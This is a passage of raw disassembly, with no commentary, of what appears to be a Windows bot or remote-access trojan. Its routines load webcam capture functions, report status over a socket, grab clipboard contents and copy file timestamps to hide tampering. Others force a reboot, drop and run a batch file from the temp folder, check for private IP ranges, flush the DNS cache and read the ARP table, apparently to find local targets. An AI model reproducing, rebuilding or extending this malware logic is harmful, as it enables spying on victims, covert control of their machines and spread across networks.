loc_40AD9D: ; CODE XREF: sub_40A16C+BFE�j
; sub_40A16C+C06�j ...
mov dword ptr byte_445EDC+64h, 1
loc_40ADA7: ; CODE XREF: sub_40A16C+C22�j
push 42D7BCh
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40ADDC
push 42D7A4h
push edi
call esi ; byte_4240D4
push 42D788h
push edi
mov capCreateCaptureWindowA, eax
call esi ; byte_4240D4
cmp capCreateCaptureWindowA, ebx
mov capGetDriverDescriptionA, eax
jz short loc_40ADE7
cmp eax, ebx
jnz short loc_40ADF1
jmp short loc_40ADE7
; ---------------------------------------------------------------------------
loc_40ADDC: ; CODE XREF: sub_40A16C+C46�j
call GetLastError
mov dword ptr byte_445EDC+70h, eax
loc_40ADE7: ; CODE XREF: sub_40A16C+C68�j
; sub_40A16C+C6E�j
mov dword ptr byte_445EDC+6Ch, 1
loc_40ADF1: ; CODE XREF: sub_40A16C+C6C�j
pop edi
xor eax, eax
pop esi
pop ebp
inc eax
pop ebx
retn
sub_40A16C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40ADF9(SOCKET s, int, int, int)
sub_40ADF9 proc near ; CODE XREF: sub_40FCA3+591D�p
var_200 = dword ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword ptr byte_445EDC+4, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40AE41
push dword ptr byte_445EDC+8
lea eax, [ebp+var_200]
push 42E1D0h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AE41: ; CODE XREF: sub_40ADF9+1A�j
cmp dword ptr byte_445EDC+0Ch, esi
jz short loc_40AE75
push dword ptr byte_445EDC+10h
lea eax, [ebp+var_200]
push 42E1B8h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AE75: ; CODE XREF: sub_40ADF9+4E�j
cmp dword ptr byte_445EDC+14h, esi
jz short loc_40AEA9
push dword ptr byte_445EDC+18h
lea eax, [ebp+var_200]
push 42E19Ch
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AEA9: ; CODE XREF: sub_40ADF9+82�j
cmp dword ptr byte_445EDC+1Ch, esi
jz short loc_40AEDD
push dword ptr byte_445EDC+20h
lea eax, [ebp+var_200]
push 42E184h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AEDD: ; CODE XREF: sub_40ADF9+B6�j
cmp dword ptr byte_445EDC+24h, esi
jz short loc_40AF11
push dword ptr byte_445EDC+28h
lea eax, [ebp+var_200]
push 42E16Ch
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AF11: ; CODE XREF: sub_40ADF9+EA�j
cmp dword ptr byte_445EDC+2Ch, esi
jz short loc_40AF45
push dword ptr byte_445EDC+30h
lea eax, [ebp+var_200]
push 42E150h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AF45: ; CODE XREF: sub_40ADF9+11E�j
cmp dword ptr byte_445EDC+34h, esi
jz short loc_40AF79
push dword ptr byte_445EDC+38h
lea eax, [ebp+var_200]
push 42E138h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AF79: ; CODE XREF: sub_40ADF9+152�j
cmp dword ptr byte_445EDC+3Ch, esi
jz short loc_40AFAD
push dword ptr byte_445EDC+40h
lea eax, [ebp+var_200]
push 42E11Ch
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AFAD: ; CODE XREF: sub_40ADF9+186�j
cmp dword ptr byte_445EDC+44h, esi
jz short loc_40AFE1
push dword ptr byte_445EDC+48h
lea eax, [ebp+var_200]
push 42E104h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40AFE1: ; CODE XREF: sub_40ADF9+1BA�j
cmp dword ptr byte_445EDC+4Ch, esi
jz short loc_40B015
push dword ptr byte_445EDC+50h
lea eax, [ebp+var_200]
push 42E0E8h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40B015: ; CODE XREF: sub_40ADF9+1EE�j
cmp dword ptr byte_445EDC+54h, esi
jz short loc_40B049
push dword ptr byte_445EDC+58h
lea eax, [ebp+var_200]
push 42E0D0h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40B049: ; CODE XREF: sub_40ADF9+222�j
cmp dword ptr byte_445EDC+5Ch, esi
jz short loc_40B07D
push dword ptr byte_445EDC+60h
lea eax, [ebp+var_200]
push 42E0B4h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40B07D: ; CODE XREF: sub_40ADF9+256�j
cmp dword ptr byte_445EDC+64h, esi
jz short loc_40B0B1
push dword ptr byte_445EDC+68h
lea eax, [ebp+var_200]
push 42E09Ch
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40B0B1: ; CODE XREF: sub_40ADF9+28A�j
cmp dword ptr byte_445EDC+6Ch, esi
jz short loc_40B0E5
push dword ptr byte_445EDC+70h
lea eax, [ebp+var_200]
push 42E080h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40B0E5: ; CODE XREF: sub_40ADF9+2BE�j
lea eax, [ebp+var_200]
push 42E050h
push eax
call sub_41795B
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40B112
push esi ; int
lea eax, [ebp+var_200]
push edi ; int
push eax ; int
push ebx ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40B112: ; CODE XREF: sub_40ADF9+302�j
lea eax, [ebp+var_200]
push eax
call sub_40CB08
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40ADF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B124 proc near ; CODE XREF: sub_40FCA3+BF5�p
; sub_40FCA3+C26�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_40B1AF
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_40B1AF
cmp [ebp+arg_8], esi
jz short loc_40B1AF
cmp byte ptr [eax], 0
jz short loc_40B1AF
push ebx
push edi
call sub_422D6D
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_40B1AA
push [ebp+arg_4]
push edi
call sub_417F60
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40B1A3
sub eax, edi
push eax
push edi
push ebx
call sub_419300
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_4180D0
push eax
push [ebp+arg_8]
push ebx
call sub_419440
push [ebp+arg_4]
call sub_4180D0
add eax, esi
push eax
push ebx
call sub_417FF0
push ebx
push edi
call sub_417FE0
add esp, 30h
mov esi, edi
loc_40B1A3: ; CODE XREF: sub_40B124+3C�j
push ebx ; lpMem
call sub_418227
pop ecx
loc_40B1AA: ; CODE XREF: sub_40B124+2B�j
mov eax, esi
pop ebx
jmp short loc_40B1B1
; ---------------------------------------------------------------------------
loc_40B1AF: ; CODE XREF: sub_40B124+C�j
; sub_40B124+13�j ...
xor eax, eax
loc_40B1B1: ; CODE XREF: sub_40B124+89�j
pop edi
pop esi
pop ebp
retn
sub_40B124 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1B5 proc near ; CODE XREF: sub_40FB24+EC�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor ebx, ebx
push 7D0h
lea eax, [ebp+var_7D0]
push ebx
push eax
call sub_4179E0
mov esi, [ebp+arg_0]
push esi
call sub_4180D0
xor edi, edi
add esp, 10h
inc edi
cmp eax, edi
jge short loc_40B1ED
or eax, 0FFFFFFFFh
jmp short loc_40B254
; ---------------------------------------------------------------------------
loc_40B1ED: ; CODE XREF: sub_40B1B5+31�j
xor ecx, ecx
cmp eax, ebx
mov [ebp+var_7D0], esi
jle short loc_40B20E
loc_40B1F9: ; CODE XREF: sub_40B1B5+57�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_40B206
cmp dl, 0Dh
jnz short loc_40B209
loc_40B206: ; CODE XREF: sub_40B1B5+4A�j
mov [ecx+esi], bl
loc_40B209: ; CODE XREF: sub_40B1B5+4F�j
inc ecx
cmp ecx, eax
jl short loc_40B1F9
loc_40B20E: ; CODE XREF: sub_40B1B5+42�j
xor edx, edx
cmp eax, ebx
jle short loc_40B236
loc_40B214: ; CODE XREF: sub_40B1B5+7F�j
cmp [edx+esi], bl
jnz short loc_40B231
lea ecx, [edx+esi+1]
cmp [ecx], bl
jz short loc_40B231
cmp edi, 1F4h
jge short loc_40B236
mov [ebp+edi*4+var_7D0], ecx
inc edi
loc_40B231: ; CODE XREF: sub_40B1B5+62�j
; sub_40B1B5+6A�j
inc edx
cmp edx, eax
jl short loc_40B214
loc_40B236: ; CODE XREF: sub_40B1B5+5D�j
; sub_40B1B5+72�j
cmp [ebp+arg_4], ebx
jz short loc_40B252
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_417A40
add esp, 0Ch
loc_40B252: ; CODE XREF: sub_40B1B5+84�j
mov eax, edi
loc_40B254: ; CODE XREF: sub_40B1B5+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B1B5 endp
; =============== S U B R O U T I N E =======================================
sub_40B259 proc near ; CODE XREF: sub_40B2B3+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_40B292
push ebx
mov ebx, edi
loc_40B276: ; CODE XREF: sub_40B259+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_40B295
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_40B276
pop ebx
loc_40B292: ; CODE XREF: sub_40B259+18�j
pop edi
pop esi
retn
sub_40B259 endp
; =============== S U B R O U T I N E =======================================
sub_40B295 proc near ; CODE XREF: sub_40B259+25�p
; sub_40B2B3+69�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax ; MultiByteStr
call sub_419841
cmp al, 61h
pop ecx
jl short loc_40B2B0
cmp al, 7Ah
jg short loc_40B2B0
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_40B2B0: ; CODE XREF: sub_40B295+E�j
; sub_40B295+12�j
xor eax, eax
retn
sub_40B295 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2B3 proc near ; CODE XREF: sub_40CBE8+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_417F30
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_4180D0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_4180D0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_40B259
add esp, 14h
dec esi
mov edi, esi
jmp short loc_40B365
; ---------------------------------------------------------------------------
loc_40B2F3: ; CODE XREF: sub_40B2B3+B4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax ; MultiByteStr
call sub_419841
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax ; MultiByteStr
call sub_419841
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40B363
loc_40B315: ; CODE XREF: sub_40B2B3+AE�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_40B295
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_40B336
mov eax, ecx
loc_40B336: ; CODE XREF: sub_40B2B3+7F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40B373
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax ; MultiByteStr
call sub_419841
movsx ecx, byte ptr [edi+ebx]
push ecx ; MultiByteStr
mov [ebp+var_8], eax
call sub_419841
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_40B315
loc_40B363: ; CODE XREF: sub_40B2B3+60�j
dec edi
dec esi
loc_40B365: ; CODE XREF: sub_40B2B3+3E�j
test esi, esi
jg short loc_40B2F3
mov eax, [ebp+arg_0]
add eax, edi
loc_40B36E: ; CODE XREF: sub_40B2B3+C2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40B373: ; CODE XREF: sub_40B2B3+88�j
xor eax, eax
jmp short loc_40B36E
sub_40B2B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B377 proc near ; CODE XREF: sub_40FCA3+3D60�p
; sub_40FCA3+4D98�p
Buffer = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call GetLastError
mov esi, eax
push 0 ; Arguments
lea eax, [ebp+Buffer]
push 100h ; nSize
push eax ; lpBuffer
push 400h ; dwLanguageId
push esi ; dwMessageId
push 0 ; lpSource
push 1200h ; dwFlags
call FormatMessageA ; FormatMessageA
lea eax, [ebp+Buffer]
loc_40B3B0: ; CODE XREF: sub_40B377+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40B3BC
cmp cl, 9
jnz short loc_40B3BF
loc_40B3BC: ; CODE XREF: sub_40B377+3E�j
inc eax
jmp short loc_40B3B0
; ---------------------------------------------------------------------------
loc_40B3BF: ; CODE XREF: sub_40B377+43�j
; sub_40B377+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+Buffer]
cmp eax, ecx
jb short loc_40B3D9
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40B3BF
cmp cl, 21h
jl short loc_40B3BF
loc_40B3D9: ; CODE XREF: sub_40B377+54�j
lea eax, [ebp+Buffer]
push esi
push eax
mov esi, 445F50h
push [ebp+arg_0]
push 42E1ECh
push 200h
push esi
call sub_417EDA
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40B377 endp
; =============== S U B R O U T I N E =======================================
sub_40B401 proc near ; CODE XREF: sub_40FCA3+5894�p
push esi
push 0 ; hWndNewOwner
call OpenClipboard ; OpenClipboard
test eax, eax
jz short loc_40B438
push 1 ; uFormat
call GetClipboardData ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40B438
push edi
push esi ; hMem
call GlobalLock ; GlobalLock
push esi ; hMem
mov edi, eax
call GlobalUnlock ; GlobalUnlock
call CloseClipboard ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B438: ; CODE XREF: sub_40B401+B�j
; sub_40B401+19�j
xor eax, eax
pop esi
retn
sub_40B401 endp
; =============== S U B R O U T I N E =======================================
sub_40B43C proc near ; CODE XREF: sub_40FCA3+4B42�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset ClassName
push esi ; lpWindowName
push edi ; lpClassName
call FindWindowA ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40B4B8
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword ptr byte_424108+8
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call dword ptr byte_424108+4
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_41795B
pop ecx
pop ecx
push esi ; lParam
push 1 ; wParam
push 4C8h ; Msg
push ebp ; hWnd
call SendMessageA ; SendMessageA
push esi ; lParam
push 1 ; wParam
push 4C9h ; Msg
push ebp ; hWnd
call SendMessageA ; SendMessageA
push ebx
call dword ptr byte_424108
push edi
call dword ptr byte_424074+4
xor eax, eax
pop ebx
inc eax
jmp short loc_40B4BA
; ---------------------------------------------------------------------------
loc_40B4B8: ; CODE XREF: sub_40B43C+16�j
xor eax, eax
loc_40B4BA: ; CODE XREF: sub_40B43C+7A�j
pop edi
pop esi
pop ebp
retn
sub_40B43C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4BE proc near ; CODE XREF: sub_40F1EA+216�p
var_11C = byte ptr -11Ch
LastWriteTime = _FILETIME ptr -18h
CreationTime = _FILETIME ptr -10h
LastAccessTime = _FILETIME ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push 42E208h
push esi
call dword ptr byte_445EDC
test eax, eax
jz short loc_40B55D
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, dword ptr byte_424084
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; byte_424084
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40B55D
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push ebx ; hFile
call GetFileTime ; GetFileTime
push ebx
mov ebx, dword ptr byte_424074+4
call ebx
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; byte_424084
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40B55D
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push esi ; hFile
call SetFileTime ; SetFileTime
push esi
call ebx
loc_40B55D: ; CODE XREF: sub_40B4BE+2A�j
; sub_40B4BE+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40B4BE endp
; =============== S U B R O U T I N E =======================================
sub_40B562 proc near ; CODE XREF: sub_40FCA3+1384�p
push 1 ; int
push offset byte_42E218 ; lpName
call sub_4160EF
pop ecx
pop ecx
push 50005h ; dwReason
push 6 ; uFlags
call ExitWindowsEx ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_40B562 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B584 proc near ; CODE XREF: sub_40D66D+45F�p
; sub_40FCA3+5B37�p
Buffer = byte ptr -764h
CommandLine = byte ptr -364h
var_260 = byte ptr -260h
FileName = byte ptr -15Ch
StartupInfo = _STARTUPINFOA ptr -58h
ProcessInformation= _PROCESS_INFORMATION ptr -14h
NumberOfBytesWritten= dword ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword ptr unk_4315B4, esi
push edi
jz short loc_40B5A8
cmp dword ptr byte_445EDC+14h, esi
jnz short loc_40B5A8
push esi ; lpData
call sub_40CD17
pop ecx
loc_40B5A8: ; CODE XREF: sub_40B584+13�j
; sub_40B584+1B�j
call sub_4175E2
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 400h ; nBufferLength
call GetTempPathA ; GetTempPathA
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_260]
push 42E28Ch
push eax
call sub_41795B
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call dword ptr byte_424084
mov edi, eax
cmp edi, esi
jbe loc_40B708
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Buffer]
push 42E248h
push eax
call sub_41795B
add esp, 0Ch
lea eax, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+Buffer]
push eax
call sub_4180D0
pop ecx
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; hFile
call WriteFile ; WriteFile
push edi
call dword ptr byte_424074+4
push 10h
lea eax, [ebp+ProcessInformation]
push esi
push eax
call sub_4179E0
push 44h
lea eax, [ebp+StartupInfo]
pop edi
push edi
push esi
push eax
call sub_4179E0
add esp, 18h
mov [ebp+StartupInfo.cb], edi
mov edi, 104h
lea eax, [ebp+FileName]
push edi
push eax
push esi
mov [ebp+StartupInfo.lpTitle], 440F9Ch
mov [ebp+StartupInfo.dwFlags], 1
mov [ebp+StartupInfo.wShowWindow], si
call dword ptr byte_4240F8
push eax
call dword ptr byte_424084+4
lea eax, [ebp+FileName]
push eax
call dword ptr byte_42409C+4
cmp eax, 0FFFFFFFFh
jz short loc_40B6B0
lea eax, [ebp+FileName]
push 80h ; dwFileAttributes
push eax ; lpFileName
call SetFileAttributesA ; SetFileAttributesA
loc_40B6B0: ; CODE XREF: sub_40B584+118�j
lea eax, [ebp+FileName]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Buffer]
push 42E22Ch
push eax
call sub_41795B
add esp, 10h
lea eax, [ebp+CommandLine]
push edi ; nSize
push eax ; lpDst
lea eax, [ebp+Buffer]
push eax ; lpSrc
call ExpandEnvironmentStringsA ; ExpandEnvironmentStringsA
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push esi ; lpCurrentDirectory
push esi ; lpEnvironment
push 4008h ; dwCreationFlags
push 1 ; bInheritHandles
push esi ; lpThreadAttributes
lea eax, [ebp+CommandLine]
push esi ; lpProcessAttributes
push eax ; lpCommandLine
push esi ; lpApplicationName
call CreateProcessA ; CreateProcessA
loc_40B708: ; CODE XREF: sub_40B584+72�j
pop edi
pop esi
leave
retn
sub_40B584 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B70C proc near ; CODE XREF: sub_40F1EA+34�p
Buffer = byte ptr -1860h
CommandLine = byte ptr -158h
ProcessInformation= _PROCESS_INFORMATION ptr -58h
StartupInfo = _STARTUPINFOA ptr -48h
NumberOfBytesWritten= dword ptr -4
push ebp
mov ebp, esp
mov eax, 1860h
call sub_417F30
push esi
push edi
mov ecx, 5C1h
mov esi, 42E2A8h
lea edi, [ebp+Buffer]
lea eax, [ebp+CommandLine]
rep movsd
movsw
push 42E298h
push eax
movsb
call sub_41795B
pop ecx
xor esi, esi
pop ecx
lea eax, [ebp+CommandLine]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call dword ptr byte_424084
mov edi, eax
cmp edi, esi
jbe short loc_40B7C6
lea eax, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+Buffer]
push eax
call sub_4180D0
pop ecx
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; hFile
call WriteFile ; WriteFile
push edi
call dword ptr byte_424074+4
push 44h
lea eax, [ebp+StartupInfo]
pop edi
push edi
push esi
push eax
call sub_4179E0
add esp, 0Ch
lea ecx, [ebp+ProcessInformation]
xor eax, eax
mov [ebp+StartupInfo.cb], edi
push ecx ; lpProcessInformation
lea ecx, [ebp+StartupInfo]
push ecx ; lpStartupInfo
push esi ; lpCurrentDirectory
inc eax
push esi ; lpEnvironment
push 28h ; dwCreationFlags
mov [ebp+StartupInfo.dwFlags], eax
push eax ; bInheritHandles
push esi ; lpThreadAttributes
lea eax, [ebp+CommandLine]
push esi ; lpProcessAttributes
push eax ; lpCommandLine
push esi ; lpApplicationName
mov [ebp+StartupInfo.wShowWindow], si
call CreateProcessA ; CreateProcessA
loc_40B7C6: ; CODE XREF: sub_40B70C+55�j
pop edi
pop esi
leave
retn
sub_40B70C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7CA proc near ; CODE XREF: .text:004166F5�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push esi
push edi
jz loc_40B85C
push 440F9Ch
push [ebp+arg_0]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_40B85C
push 20h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call sub_419300
mov esi, 42B274h
lea eax, [ebp+var_20]
push esi
push eax
call sub_419260
add esp, 14h
test eax, eax
jz short loc_40B85C
push eax
call sub_417ECF
push esi
push 0
mov edi, eax
call sub_419260
add esp, 0Ch
test eax, eax
jz short loc_40B85C
push eax
call sub_417ECF
cmp edi, 0Ah
pop ecx
jz short loc_40B857
cmp edi, 0ACh
jnz short loc_40B848
cmp eax, 0Fh
jle short loc_40B85C
cmp eax, 20h
jl short loc_40B857
loc_40B848: ; CODE XREF: sub_40B7CA+72�j
cmp edi, 0C0h
jnz short loc_40B85C
cmp eax, 0A8h
jnz short loc_40B85C
loc_40B857: ; CODE XREF: sub_40B7CA+6A�j
; sub_40B7CA+7C�j
xor eax, eax
inc eax
jmp short loc_40B85E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40B7CA+C�j
; sub_40B7CA+23�j ...
xor eax, eax
loc_40B85E: ; CODE XREF: sub_40B7CA+90�j
pop edi
pop esi
leave
retn
sub_40B7CA endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B862(char *name)
sub_40B862 proc near ; CODE XREF: sub_4013E8+7�p
; sub_401D28+7�p ...
name = dword ptr 4
push [esp+name] ; cp
call inet_addr_0
cmp eax, 0FFFFFFFFh
jnz short locret_40B88A
push [esp+name] ; name
call gethostbyname ; gethostbyname
test eax, eax
jnz short loc_40B883
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40B883: ; CODE XREF: sub_40B862+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40B88A: ; CODE XREF: sub_40B862+D�j
retn
sub_40B862 endp
; =============== S U B R O U T I N E =======================================
sub_40B88B proc near ; CODE XREF: sub_40F8D6+9B�p
mov ecx, DnsFlushResolverCache
xor eax, eax
test ecx, ecx
jz short locret_40B899
jmp ecx
; ---------------------------------------------------------------------------
locret_40B899: ; CODE XREF: sub_40B88B+A�j
retn
sub_40B88B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B89A proc near ; CODE XREF: sub_40FCA3:loc_4154EB�p
var_88 = byte ptr -88h
SizePointer = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+SizePointer]
xor edi, edi
push ebx ; Order
push eax ; SizePointer
push edi ; IpNetTable
xor esi, esi
mov [ebp+SizePointer], edi
mov [ebp+var_4], ebx
call GetIpNetTable ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz short loc_40B921
sub ecx, 32h
jz loc_40B96B
sub ecx, 48h
jz short loc_40B8F6
sub ecx, 6Eh
jz short loc_40B8EF
loc_40B8D8: ; CODE XREF: sub_40B89A+85�j
push eax
lea eax, [ebp+var_88]
push 42FA64h
push eax
call sub_41795B
add esp, 0Ch
jmp short loc_40B94C
; ---------------------------------------------------------------------------
loc_40B8EF: ; CODE XREF: sub_40B89A+3C�j
push 42FA30h
jmp short loc_40B93E
; ---------------------------------------------------------------------------
loc_40B8F6: ; CODE XREF: sub_40B89A+37�j
push [ebp+SizePointer]
call sub_418175
push [ebp+SizePointer]
mov esi, eax
push edi
push esi
call sub_4179E0
add esp, 10h
cmp esi, edi
jz short loc_40B939
lea eax, [ebp+SizePointer]
push ebx ; Order
push eax ; SizePointer
push esi ; IpNetTable
call GetIpNetTable ; GetIpNetTable
cmp eax, edi
jnz short loc_40B8D8
loc_40B921: ; CODE XREF: sub_40B89A+29�j
cmp [esi], edi
jbe short loc_40B95C
lea ebx, [esi+4]
loc_40B928: ; CODE XREF: sub_40B89A+9B�j
push ebx ; pArpEntry
